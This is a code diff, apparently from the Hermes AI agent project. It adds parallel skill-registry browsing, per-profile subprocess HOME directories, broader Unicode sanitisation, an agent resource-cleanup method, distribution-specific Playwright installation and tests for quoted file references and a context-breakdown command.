"github": 200, "clawhub": 500, "claude-marketplace": 100,
|
||||
"lobehub": 500,
|
||||
}
|
||||
|
||||
all_results: list = []
|
||||
source_counts: dict = {}
|
||||
|
||||
for src in sources:
|
||||
sid = src.source_id()
|
||||
if source != "all" and sid != source and sid != "official":
|
||||
# Always include official source for the "first" placement
|
||||
continue
|
||||
try:
|
||||
limit = _PER_SOURCE_LIMIT.get(sid, 50)
|
||||
results = src.search("", limit=limit)
|
||||
source_counts[sid] = len(results)
|
||||
all_results.extend(results)
|
||||
except Exception:
|
||||
continue
|
||||
with c.status("[bold]Fetching skills from registries..."):
|
||||
all_results, source_counts, timed_out = parallel_search_sources(
|
||||
sources,
|
||||
query="",
|
||||
per_source_limits=_PER_SOURCE_LIMIT,
|
||||
source_filter=source,
|
||||
overall_timeout=30,
|
||||
)
|
||||
|
||||
if not all_results:
|
||||
c.print("[dim]No skills found in the Skills Hub.[/]\n")
|
||||
@@ -252,8 +249,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
|
||||
# Build header
|
||||
source_label = f"— {source}" if source != "all" else "— all sources"
|
||||
loaded_label = f"{total} skills loaded"
|
||||
if timed_out:
|
||||
loaded_label += f", {len(timed_out)} source(s) still loading"
|
||||
c.print(f"\n[bold]Skills Hub — Browse {source_label}[/]"
|
||||
f" [dim]({total} skills, page {page}/{total_pages})[/]")
|
||||
f" [dim]({loaded_label}, page {page}/{total_pages})[/]")
|
||||
if official_count > 0 and page == 1:
|
||||
c.print(f"[bright_cyan]★ {official_count} official optional skill(s) from Nous Research[/]")
|
||||
c.print()
|
||||
@@ -300,8 +300,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
parts = [f"{sid}: {ct}" for sid, ct in sorted(source_counts.items())]
|
||||
c.print(f" [dim]Sources: {', '.join(parts)}[/]")
|
||||
|
||||
c.print("[dim]Use: hermes skills inspect <identifier> to preview, "
|
||||
"hermes skills install <identifier> to install[/]\n")
|
||||
if timed_out:
|
||||
c.print(f" [yellow]⚡ Slow sources skipped: {', '.join(timed_out)} "
|
||||
f"— run again for cached results[/]")
|
||||
|
||||
c.print("[dim]Tip: 'hermes skills search <query>' searches deeper across all registries[/]\n")
|
||||
|
||||
|
||||
def do_install(identifier: str, category: str = "", force: bool = False,
|
||||
|
||||
@@ -111,6 +111,32 @@ def display_hermes_home() -> str:
|
||||
return str(home)
|
||||
|
||||
|
||||
def get_subprocess_home() -> str | None:
|
||||
"""Return a per-profile HOME directory for subprocesses, or None.
|
||||
|
||||
When ``{HERMES_HOME}/home/`` exists on disk, subprocesses should use it
|
||||
as ``HOME`` so system tools (git, ssh, gh, npm …) write their configs
|
||||
inside the Hermes data directory instead of the OS-level ``/root`` or
|
||||
``~/``. This provides:
|
||||
|
||||
* **Docker persistence** — tool configs land inside the persistent volume.
|
||||
* **Profile isolation** — each profile gets its own git identity, SSH
|
||||
keys, gh tokens, etc.
|
||||
|
||||
The Python process's own ``os.environ["HOME"]`` and ``Path.home()`` are
|
||||
**never** modified — only subprocess environments should inject this value.
|
||||
Activation is directory-based: if the ``home/`` subdirectory doesn't
|
||||
exist, returns ``None`` and behavior is unchanged.
|
||||
"""
|
||||
hermes_home = os.getenv("HERMES_HOME")
|
||||
if not hermes_home:
|
||||
return None
|
||||
profile_home = os.path.join(hermes_home, "home")
|
||||
if os.path.isdir(profile_home):
|
||||
return profile_home
|
||||
return None
|
||||
|
||||
|
||||
VALID_REASONING_EFFORTS = ("minimal", "low", "medium", "high", "xhigh")
|
||||
|
||||
|
||||
|
||||
+1
-1
@@ -16,7 +16,7 @@ dependencies = [
|
||||
"anthropic>=0.39.0,<1",
|
||||
"python-dotenv>=1.2.1,<2",
|
||||
"fire>=0.7.1,<1",
|
||||
"httpx>=0.28.1,<1",
|
||||
"httpx[socks]>=0.28.1,<1",
|
||||
"rich>=14.3.3,<15",
|
||||
"tenacity>=9.1.4,<10",
|
||||
"pyyaml>=6.0.2,<7",
|
||||
|
||||
+206
-41
@@ -359,8 +359,9 @@ def _sanitize_surrogates(text: str) -> str:
|
||||
def _sanitize_messages_surrogates(messages: list) -> bool:
|
||||
"""Sanitize surrogate characters from all string content in a messages list.
|
||||
|
||||
Walks message dicts in-place. Returns True if any surrogates were found
|
||||
and replaced, False otherwise.
|
||||
Walks message dicts in-place. Returns True if any surrogates were found
|
||||
and replaced, False otherwise. Covers content/text, name, and tool call
|
||||
metadata/arguments so retries don't fail on a non-content field.
|
||||
"""
|
||||
found = False
|
||||
for msg in messages:
|
||||
@@ -377,6 +378,88 @@ def _sanitize_messages_surrogates(messages: list) -> bool:
|
||||
if isinstance(text, str) and _SURROGATE_RE.search(text):
|
||||
part["text"] = _SURROGATE_RE.sub('\ufffd', text)
|
||||
found = True
|
||||
name = msg.get("name")
|
||||
if isinstance(name, str) and _SURROGATE_RE.search(name):
|
||||
msg["name"] = _SURROGATE_RE.sub('\ufffd', name)
|
||||
found = True
|
||||
tool_calls = msg.get("tool_calls")
|
||||
if isinstance(tool_calls, list):
|
||||
for tc in tool_calls:
|
||||
if not isinstance(tc, dict):
|
||||
continue
|
||||
tc_id = tc.get("id")
|
||||
if isinstance(tc_id, str) and _SURROGATE_RE.search(tc_id):
|
||||
tc["id"] = _SURROGATE_RE.sub('\ufffd', tc_id)
|
||||
found = True
|
||||
fn = tc.get("function")
|
||||
if isinstance(fn, dict):
|
||||
fn_name = fn.get("name")
|
||||
if isinstance(fn_name, str) and _SURROGATE_RE.search(fn_name):
|
||||
fn["name"] = _SURROGATE_RE.sub('\ufffd', fn_name)
|
||||
found = True
|
||||
fn_args = fn.get("arguments")
|
||||
if isinstance(fn_args, str) and _SURROGATE_RE.search(fn_args):
|
||||
fn["arguments"] = _SURROGATE_RE.sub('\ufffd', fn_args)
|
||||
found = True
|
||||
return found
|
||||
|
||||
|
||||
def _strip_non_ascii(text: str) -> str:
|
||||
"""Remove non-ASCII characters, replacing with closest ASCII equivalent or removing.
|
||||
|
||||
Used as a last resort when the system encoding is ASCII and can't handle
|
||||
any non-ASCII characters (e.g. LANG=C on Chromebooks).
|
||||
"""
|
||||
return text.encode('ascii', errors='ignore').decode('ascii')
|
||||
|
||||
|
||||
def _sanitize_messages_non_ascii(messages: list) -> bool:
|
||||
"""Strip non-ASCII characters from all string content in a messages list.
|
||||
|
||||
This is a last-resort recovery for systems with ASCII-only encoding
|
||||
(LANG=C, Chromebooks, minimal containers). Returns True if any
|
||||
non-ASCII content was found and sanitized.
|
||||
"""
|
||||
found = False
|
||||
for msg in messages:
|
||||
if not isinstance(msg, dict):
|
||||
continue
|
||||
# Sanitize content (string)
|
||||
content = msg.get("content")
|
||||
if isinstance(content, str):
|
||||
sanitized = _strip_non_ascii(content)
|
||||
if sanitized != content:
|
||||
msg["content"] = sanitized
|
||||
found = True
|
||||
elif isinstance(content, list):
|
||||
for part in content:
|
||||
if isinstance(part, dict):
|
||||
text = part.get("text")
|
||||
if isinstance(text, str):
|
||||
sanitized = _strip_non_ascii(text)
|
||||
if sanitized != text:
|
||||
part["text"] = sanitized
|
||||
found = True
|
||||
# Sanitize name field (can contain non-ASCII in tool results)
|
||||
name = msg.get("name")
|
||||
if isinstance(name, str):
|
||||
sanitized = _strip_non_ascii(name)
|
||||
if sanitized != name:
|
||||
msg["name"] = sanitized
|
||||
found = True
|
||||
# Sanitize tool_calls
|
||||
tool_calls = msg.get("tool_calls")
|
||||
if isinstance(tool_calls, list):
|
||||
for tc in tool_calls:
|
||||
if isinstance(tc, dict):
|
||||
fn = tc.get("function", {})
|
||||
if isinstance(fn, dict):
|
||||
fn_args = fn.get("arguments")
|
||||
if isinstance(fn_args, str):
|
||||
sanitized = _strip_non_ascii(fn_args)
|
||||
if sanitized != fn_args:
|
||||
fn["arguments"] = sanitized
|
||||
found = True
|
||||
return found
|
||||
|
||||
|
||||
@@ -864,6 +947,7 @@ class AIAgent:
|
||||
client_kwargs["default_headers"] = headers
|
||||
|
||||
self.api_key = client_kwargs.get("api_key", "")
|
||||
self.base_url = client_kwargs.get("base_url", self.base_url)
|
||||
try:
|
||||
self.client = self._create_openai_client(client_kwargs, reason="agent_init", shared=True)
|
||||
if not self.quiet_mode:
|
||||
@@ -1893,19 +1977,14 @@ class AIAgent:
|
||||
except Exception as e:
|
||||
logger.debug("Background memory/skill review failed: %s", e)
|
||||
finally:
|
||||
# Explicitly close the OpenAI/httpx client so GC doesn't
|
||||
# try to clean it up on a dead asyncio event loop (which
|
||||
# produces "Event loop is closed" errors in the terminal).
|
||||
# Close all resources (httpx client, subprocesses, etc.) so
|
||||
# GC doesn't try to clean them up on a dead asyncio event
|
||||
# loop (which produces "Event loop is closed" errors).
|
||||
if review_agent is not None:
|
||||
client = getattr(review_agent, "client", None)
|
||||
if client is not None:
|
||||
try:
|
||||
review_agent._close_openai_client(
|
||||
client, reason="bg_review_done", shared=True
|
||||
)
|
||||
review_agent.client = None
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
review_agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
t = threading.Thread(target=_run_review, daemon=True, name="bg-review")
|
||||
t.start()
|
||||
@@ -2645,6 +2724,64 @@ class AIAgent:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def close(self) -> None:
|
||||
"""Release all resources held by this agent instance.
|
||||
|
||||
Cleans up subprocess resources that would otherwise become orphans:
|
||||
- Background processes tracked in ProcessRegistry
|
||||
- Terminal sandbox environments
|
||||
- Browser daemon sessions
|
||||
- Active child agents (subagent delegation)
|
||||
- OpenAI/httpx client connections
|
||||
|
||||
Safe to call multiple times (idempotent). Each cleanup step is
|
||||
independently guarded so a failure in one does not prevent the rest.
|
||||
"""
|
||||
task_id = getattr(self, "session_id", None) or ""
|
||||
|
||||
# 1. Kill background processes for this task
|
||||
try:
|
||||
from tools.process_registry import process_registry
|
||||
process_registry.kill_all(task_id=task_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2. Clean terminal sandbox environments
|
||||
try:
|
||||
from tools.terminal_tool import cleanup_vm
|
||||
cleanup_vm(task_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 3. Clean browser daemon sessions
|
||||
try:
|
||||
from tools.browser_tool import cleanup_browser
|
||||
cleanup_browser(task_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 4. Close active child agents
|
||||
try:
|
||||
with self._active_children_lock:
|
||||
children = list(self._active_children)
|
||||
self._active_children.clear()
|
||||
for child in children:
|
||||
try:
|
||||
child.close()
|
||||
except Exception:
|
||||
pass
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 5. Close the OpenAI/httpx client
|
||||
try:
|
||||
client = getattr(self, "client", None)
|
||||
if client is not None:
|
||||
self._close_openai_client(client, reason="agent_close", shared=True)
|
||||
self.client = None
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def _hydrate_todo_store(self, history: List[Dict[str, Any]]) -> None:
|
||||
"""
|
||||
Recover todo state from conversation history.
|
||||
@@ -2937,7 +3074,7 @@ class AIAgent:
|
||||
|
||||
@staticmethod
|
||||
def _cap_delegate_task_calls(tool_calls: list) -> list:
|
||||
"""Truncate excess delegate_task calls to MAX_CONCURRENT_CHILDREN.
|
||||
"""Truncate excess delegate_task calls to max_concurrent_children.
|
||||
|
||||
The delegate_tool caps the task list inside a single call, but the
|
||||
model can emit multiple separate delegate_task tool_calls in one
|
||||
@@ -2945,23 +3082,24 @@ class AIAgent:
|
||||
|
||||
Returns the original list if no truncation was needed.
|
||||
"""
|
||||
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
|
||||
from tools.delegate_tool import _get_max_concurrent_children
|
||||
max_children = _get_max_concurrent_children()
|
||||
delegate_count = sum(1 for tc in tool_calls if tc.function.name == "delegate_task")
|
||||
if delegate_count <= MAX_CONCURRENT_CHILDREN:
|
||||
if delegate_count <= max_children:
|
||||
return tool_calls
|
||||
kept_delegates = 0
|
||||
truncated = []
|
||||
for tc in tool_calls:
|
||||
if tc.function.name == "delegate_task":
|
||||
if kept_delegates < MAX_CONCURRENT_CHILDREN:
|
||||
if kept_delegates < max_children:
|
||||
truncated.append(tc)
|
||||
kept_delegates += 1
|
||||
else:
|
||||
truncated.append(tc)
|
||||
logger.warning(
|
||||
"Truncated %d excess delegate_task call(s) to enforce "
|
||||
"MAX_CONCURRENT_CHILDREN=%d limit",
|
||||
delegate_count - MAX_CONCURRENT_CHILDREN, MAX_CONCURRENT_CHILDREN,
|
||||
"max_concurrent_children=%d limit",
|
||||
delegate_count - max_children, max_children,
|
||||
)
|
||||
return truncated
|
||||
|
||||
@@ -5519,7 +5657,7 @@ class AIAgent:
|
||||
preserve_dots=self._anthropic_preserve_dots(),
|
||||
context_length=ctx_len,
|
||||
base_url=getattr(self, "_anthropic_base_url", None),
|
||||
fast_mode=self.request_overrides.get("speed") == "fast",
|
||||
fast_mode=(self.request_overrides or {}).get("speed") == "fast",
|
||||
)
|
||||
|
||||
if self.api_mode == "codex_responses":
|
||||
@@ -6143,17 +6281,23 @@ class AIAgent:
|
||||
if messages and messages[-1].get("_flush_sentinel") == _sentinel:
|
||||
messages.pop()
|
||||
|
||||
def _compress_context(self, messages: list, system_message: str, *, approx_tokens: int = None, task_id: str = "default") -> tuple:
|
||||
def _compress_context(self, messages: list, system_message: str, *, approx_tokens: int = None, task_id: str = "default", focus_topic: str = None) -> tuple:
|
||||
"""Compress conversation context and split the session in SQLite.
|
||||
|
||||
Args:
|
||||
focus_topic: Optional focus string for guided compression — the
|
||||
summariser will prioritise preserving information related to
|
||||
this topic. Inspired by Claude Code's ``/compact <focus>``.
|
||||
|
||||
Returns:
|
||||
(compressed_messages, new_system_prompt) tuple
|
||||
"""
|
||||
_pre_msg_count = len(messages)
|
||||
logger.info(
|
||||
"context compression started: session=%s messages=%d tokens=~%s model=%s",
|
||||
"context compression started: session=%s messages=%d tokens=~%s model=%s focus=%r",
|
||||
self.session_id or "none", _pre_msg_count,
|
||||
f"{approx_tokens:,}" if approx_tokens else "unknown", self.model,
|
||||
focus_topic,
|
||||
)
|
||||
# Pre-compression memory flush: let the model save memories before they're lost
|
||||
self.flush_memories(messages, min_turns=0)
|
||||
@@ -6165,7 +6309,7 @@ class AIAgent:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
compressed = self.context_compressor.compress(messages, current_tokens=approx_tokens)
|
||||
compressed = self.context_compressor.compress(messages, current_tokens=approx_tokens, focus_topic=focus_topic)
|
||||
|
||||
todo_snapshot = self._todo_store.format_for_injection()
|
||||
if todo_snapshot:
|
||||
@@ -7183,7 +7327,7 @@ class AIAgent:
|
||||
self._thinking_prefill_retries = 0
|
||||
self._last_content_with_tools = None
|
||||
self._mute_post_response = False
|
||||
self._surrogate_sanitized = False
|
||||
self._unicode_sanitization_passes = 0
|
||||
|
||||
# Pre-turn connection health check: detect and clean up dead TCP
|
||||
# connections left over from provider outages or dropped streams.
|
||||
@@ -7623,6 +7767,7 @@ class AIAgent:
|
||||
|
||||
finish_reason = "stop"
|
||||
response = None # Guard against UnboundLocalError if all retries fail
|
||||
api_kwargs = None # Guard against UnboundLocalError in except handler
|
||||
|
||||
while retry_count < max_retries:
|
||||
try:
|
||||
@@ -8168,22 +8313,40 @@ class AIAgent:
|
||||
self.thinking_callback("")
|
||||
|
||||
# -----------------------------------------------------------
|
||||
# Surrogate character recovery. UnicodeEncodeError happens
|
||||
# when the messages contain lone surrogates (U+D800..U+DFFF)
|
||||
# that are invalid UTF-8. Common source: clipboard paste
|
||||
# from Google Docs or similar rich-text editors. We sanitize
|
||||
# the entire messages list in-place and retry once.
|
||||
# UnicodeEncodeError recovery. Two common causes:
|
||||
# 1. Lone surrogates (U+D800..U+DFFF) from clipboard paste
|
||||
# (Google Docs, rich-text editors) — sanitize and retry.
|
||||
# 2. ASCII codec on systems with LANG=C or non-UTF-8 locale
|
||||
# (e.g. Chromebooks) — any non-ASCII character fails.
|
||||
# Detect via the error message mentioning 'ascii' codec.
|
||||
# We sanitize messages in-place and may retry twice:
|
||||
# first to strip surrogates, then once more for pure
|
||||
# ASCII-only locale sanitization if needed.
|
||||
# -----------------------------------------------------------
|
||||
if isinstance(api_error, UnicodeEncodeError) and not getattr(self, '_surrogate_sanitized', False):
|
||||
self._surrogate_sanitized = True
|
||||
if _sanitize_messages_surrogates(messages):
|
||||
if isinstance(api_error, UnicodeEncodeError) and getattr(self, '_unicode_sanitization_passes', 0) < 2:
|
||||
_err_str = str(api_error).lower()
|
||||
_is_ascii_codec = "'ascii'" in _err_str or "ascii" in _err_str
|
||||
_surrogates_found = _sanitize_messages_surrogates(messages)
|
||||
if _surrogates_found:
|
||||
self._unicode_sanitization_passes += 1
|
||||
self._vprint(
|
||||
f"{self.log_prefix}⚠️ Stripped invalid surrogate characters from messages. Retrying...",
|
||||
force=True,
|
||||
)
|
||||
continue
|
||||
# Surrogates weren't in messages — might be in system
|
||||
# prompt or prefill. Fall through to normal error path.
|
||||
if _is_ascii_codec:
|
||||
# ASCII codec: the system encoding can't handle
|
||||
# non-ASCII characters at all. Sanitize all
|
||||
# non-ASCII content from messages and retry.
|
||||
if _sanitize_messages_non_ascii(messages):
|
||||
self._unicode_sanitization_passes += 1
|
||||
self._vprint(
|
||||
f"{self.log_prefix}⚠️ System encoding is ASCII — stripped non-ASCII characters from messages. Retrying...",
|
||||
force=True,
|
||||
)
|
||||
continue
|
||||
# Nothing to sanitize in messages — might be in system
|
||||
# prompt or prefill. Fall through to normal error path.
|
||||
|
||||
status_code = getattr(api_error, "status_code", None)
|
||||
error_context = self._extract_api_error_context(api_error)
|
||||
@@ -8639,9 +8802,10 @@ class AIAgent:
|
||||
if self._try_activate_fallback():
|
||||
retry_count = 0
|
||||
continue
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="non_retryable_client_error", error=api_error,
|
||||
)
|
||||
if api_kwargs is not None:
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="non_retryable_client_error", error=api_error,
|
||||
)
|
||||
self._emit_status(
|
||||
f"❌ Non-retryable error (HTTP {status_code}): "
|
||||
f"{self._summarize_api_error(api_error)}"
|
||||
@@ -8744,9 +8908,10 @@ class AIAgent:
|
||||
self.log_prefix, max_retries, _final_summary,
|
||||
_provider, _model, len(api_messages), f"{approx_tokens:,}",
|
||||
)
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="max_retries_exhausted", error=api_error,
|
||||
)
|
||||
if api_kwargs is not None:
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="max_retries_exhausted", error=api_error,
|
||||
)
|
||||
self._persist_session(messages, conversation_history)
|
||||
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
|
||||
if _is_stream_drop:
|
||||
|
||||
+35
-6
@@ -1082,10 +1082,19 @@ install_node_deps() {
|
||||
log_success "Node.js dependencies installed"
|
||||
|
||||
# Install Playwright browser + system dependencies.
|
||||
# Playwright's install-deps only supports apt/dnf/zypper natively.
|
||||
# Playwright's --with-deps only supports apt-based systems natively.
|
||||
# For Arch/Manjaro we install the system libs via pacman first.
|
||||
# Other systems must install Chromium dependencies manually.
|
||||
log_info "Installing browser engine (Playwright Chromium)..."
|
||||
case "$DISTRO" in
|
||||
ubuntu|debian|raspbian|pop|linuxmint|elementary|zorin|kali|parrot)
|
||||
log_info "Playwright may request sudo to install browser system dependencies (shared libraries)."
|
||||
log_info "This is standard Playwright setup — Hermes itself does not require root access."
|
||||
cd "$INSTALL_DIR" && npx playwright install --with-deps chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — browser tools will not work."
|
||||
log_warn "Try running manually: cd $INSTALL_DIR && npx playwright install --with-deps chromium"
|
||||
}
|
||||
;;
|
||||
arch|manjaro)
|
||||
if command -v pacman &> /dev/null; then
|
||||
log_info "Arch/Manjaro detected — installing Chromium system dependencies via pacman..."
|
||||
@@ -1100,15 +1109,35 @@ install_node_deps() {
|
||||
log_warn " sudo pacman -S nss atk at-spi2-core cups libdrm libxkbcommon mesa pango cairo alsa-lib"
|
||||
fi
|
||||
fi
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || true
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — browser tools will not work."
|
||||
}
|
||||
;;
|
||||
fedora|rhel|centos|rocky|alma)
|
||||
log_warn "Playwright does not support automatic dependency installation on RPM-based systems."
|
||||
log_info "Install Chromium system dependencies manually before using browser tools:"
|
||||
log_info " sudo dnf install nss atk at-spi2-core cups-libs libdrm libxkbcommon mesa-libgbm pango cairo alsa-lib"
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — install dependencies above and retry."
|
||||
}
|
||||
;;
|
||||
opensuse*|sles)
|
||||
log_warn "Playwright does not support automatic dependency installation on zypper-based systems."
|
||||
log_info "Install Chromium system dependencies manually before using browser tools:"
|
||||
log_info " sudo zypper install mozilla-nss libatk-1_0-0 at-spi2-core cups-libs libdrm2 libxkbcommon0 Mesa-libgbm1 pango cairo libasound2"
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — install dependencies above and retry."
|
||||
}
|
||||
;;
|
||||
*)
|
||||
log_info "Playwright may request sudo to install browser system dependencies (shared libraries)."
|
||||
log_info "This is standard Playwright setup — Hermes itself does not require root access."
|
||||
cd "$INSTALL_DIR" && npx playwright install --with-deps chromium 2>/dev/null || true
|
||||
log_warn "Playwright does not support automatic dependency installation on $DISTRO."
|
||||
log_info "Install Chromium/browser system dependencies for your distribution, then run:"
|
||||
log_info " cd $INSTALL_DIR && npx playwright install chromium"
|
||||
log_info "Browser tools will not work until dependencies are installed."
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || true
|
||||
;;
|
||||
esac
|
||||
log_success "Browser engine installed"
|
||||
log_success "Browser engine setup complete"
|
||||
fi
|
||||
|
||||
# Install WhatsApp bridge dependencies
|
||||
|
||||
@@ -658,6 +658,19 @@ class TestGetTextAuxiliaryClient:
|
||||
assert client is None
|
||||
assert model is None
|
||||
|
||||
def test_custom_endpoint_uses_codex_wrapper_when_runtime_requests_responses_api(self):
|
||||
with patch("agent.auxiliary_client._resolve_custom_runtime",
|
||||
return_value=("https://api.openai.com/v1", "sk-test", "codex_responses")), \
|
||||
patch("agent.auxiliary_client._read_main_model", return_value="gpt-5.3-codex"), \
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai:
|
||||
client, model = get_text_auxiliary_client()
|
||||
|
||||
from agent.auxiliary_client import CodexAuxiliaryClient
|
||||
assert isinstance(client, CodexAuxiliaryClient)
|
||||
assert model == "gpt-5.3-codex"
|
||||
assert mock_openai.call_args.kwargs["base_url"] == "https://api.openai.com/v1"
|
||||
assert mock_openai.call_args.kwargs["api_key"] == "sk-test"
|
||||
|
||||
|
||||
class TestVisionClientFallback:
|
||||
"""Vision client auto mode resolves known-good multimodal backends."""
|
||||
|
||||
@@ -83,6 +83,24 @@ def test_parse_references_strips_trailing_punctuation():
|
||||
assert refs[1].target == "https://example.com/docs"
|
||||
|
||||
|
||||
def test_parse_quoted_references_with_spaces_and_preserve_unquoted_ranges():
|
||||
from agent.context_references import parse_context_references
|
||||
|
||||
refs = parse_context_references(
|
||||
'review @file:"C:\\Users\\Simba\\My Project\\main.py":7-9 '
|
||||
'and @folder:"docs and specs" plus @file:src/main.py:1-2'
|
||||
)
|
||||
|
||||
assert [ref.kind for ref in refs] == ["file", "folder", "file"]
|
||||
assert refs[0].target == r"C:\Users\Simba\My Project\main.py"
|
||||
assert refs[0].line_start == 7
|
||||
assert refs[0].line_end == 9
|
||||
assert refs[1].target == "docs and specs"
|
||||
assert refs[2].target == "src/main.py"
|
||||
assert refs[2].line_start == 1
|
||||
assert refs[2].line_end == 2
|
||||
|
||||
|
||||
def test_expand_file_range_and_folder_listing(sample_repo: Path):
|
||||
from agent.context_references import preprocess_context_references
|
||||
|
||||
@@ -106,6 +124,30 @@ def test_expand_file_range_and_folder_listing(sample_repo: Path):
|
||||
assert not result.warnings
|
||||
|
||||
|
||||
def test_expand_quoted_file_reference_with_spaces(tmp_path: Path):
|
||||
from agent.context_references import preprocess_context_references
|
||||
|
||||
workspace = tmp_path / "repo"
|
||||
folder = workspace / "docs and specs"
|
||||
folder.mkdir(parents=True)
|
||||
file_path = folder / "release notes.txt"
|
||||
file_path.write_text("line 1\nline 2\nline 3\n", encoding="utf-8")
|
||||
|
||||
result = preprocess_context_references(
|
||||
'Review @file:"docs and specs/release notes.txt":2-3',
|
||||
cwd=workspace,
|
||||
context_length=100_000,
|
||||
)
|
||||
|
||||
assert result.expanded
|
||||
assert result.message.startswith("Review")
|
||||
assert "line 1" not in result.message
|
||||
assert "line 2" in result.message
|
||||
assert "line 3" in result.message
|
||||
assert "release notes.txt" in result.message
|
||||
assert not result.warnings
|
||||
|
||||
|
||||
def test_expand_git_diff_staged_and_log(sample_repo: Path):
|
||||
from agent.context_references import preprocess_context_references
|
||||
|
||||
|
||||
@@ -0,0 +1,345 @@
|
||||
"""Tests for /context command — live context window breakdown.
|
||||
|
||||
Inspired by Claude Code's /context feature.
|
||||
"""
|
||||
|
||||
import os
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_cli(tmp_path):
|
||||
"""Build a minimal HermesCLI stub with enough state for _show_context_breakdown."""
|
||||
from cli import HermesCLI
|
||||
|
||||
cli_obj = object.__new__(HermesCLI)
|
||||
# Minimal attrs expected by _show_context_breakdown
|
||||
cli_obj.agent = None
|
||||
cli_obj.conversation_history = []
|
||||
return cli_obj
|
||||
|
||||
|
||||
def _make_agent_stub(model="anthropic/claude-sonnet-4.6", system_prompt="You are Hermes.",
|
||||
context_length=200000, compression_count=0, threshold_tokens=160000,
|
||||
last_prompt_tokens=50000):
|
||||
"""Return a mock agent with attributes used by _show_context_breakdown."""
|
||||
agent = MagicMock()
|
||||
agent.model = model
|
||||
agent._cached_system_prompt = system_prompt
|
||||
agent.session_input_tokens = 1000
|
||||
agent.session_output_tokens = 500
|
||||
|
||||
compressor = MagicMock()
|
||||
compressor.context_length = context_length
|
||||
compressor.compression_count = compression_count
|
||||
compressor.threshold_tokens = threshold_tokens
|
||||
compressor.last_prompt_tokens = last_prompt_tokens
|
||||
agent.context_compressor = compressor
|
||||
|
||||
agent._memory_store = None
|
||||
agent._cached_tool_schemas = None
|
||||
return agent
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestContextBreakdown:
|
||||
"""Tests for _show_context_breakdown method."""
|
||||
|
||||
def test_no_agent(self, tmp_path, capsys):
|
||||
"""When no agent is active, prints a helpful message."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "No active agent" in out
|
||||
|
||||
def test_basic_breakdown(self, tmp_path, capsys):
|
||||
"""Basic breakdown shows model, context bar, and section headers."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub()
|
||||
cli_obj.conversation_history = [
|
||||
{"role": "user", "content": "Hello"},
|
||||
{"role": "assistant", "content": "Hi there!"},
|
||||
]
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
|
||||
# Model name should appear
|
||||
assert "claude-sonnet-4.6" in out
|
||||
# Section headers
|
||||
assert "System Prompt" in out
|
||||
assert "Conversation" in out
|
||||
# Token counts appear
|
||||
assert "tokens" in out
|
||||
|
||||
def test_shows_context_percentage(self, tmp_path, capsys):
|
||||
"""The context usage percentage is displayed."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub()
|
||||
cli_obj.conversation_history = []
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "%" in out
|
||||
|
||||
def test_shows_tool_schemas_when_present(self, tmp_path, capsys):
|
||||
"""When tool schemas are cached, their token count is shown."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
agent = _make_agent_stub()
|
||||
agent._cached_tool_schemas = [
|
||||
{"name": "tool1", "description": "Does something", "parameters": {}},
|
||||
{"name": "tool2", "description": "Does another thing", "parameters": {}},
|
||||
]
|
||||
cli_obj.agent = agent
|
||||
cli_obj.conversation_history = []
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "Tool Schemas" in out
|
||||
assert "2 tools" in out
|
||||
|
||||
def test_shows_message_role_breakdown(self, tmp_path, capsys):
|
||||
"""Individual message role counts are shown."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub()
|
||||
cli_obj.conversation_history = [
|
||||
{"role": "user", "content": "Do something"},
|
||||
{"role": "assistant", "content": "OK", "tool_calls": [
|
||||
{"id": "call_1", "function": {"name": "terminal", "arguments": '{"command":"ls"}'}}
|
||||
]},
|
||||
{"role": "tool", "content": '{"output": "file1.py\\nfile2.py"}', "tool_call_id": "call_1"},
|
||||
{"role": "assistant", "content": "Found 2 files."},
|
||||
{"role": "user", "content": "Good"},
|
||||
]
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "User messages (2)" in out
|
||||
assert "Assistant messages (2)" in out
|
||||
assert "Tool results (1)" in out
|
||||
|
||||
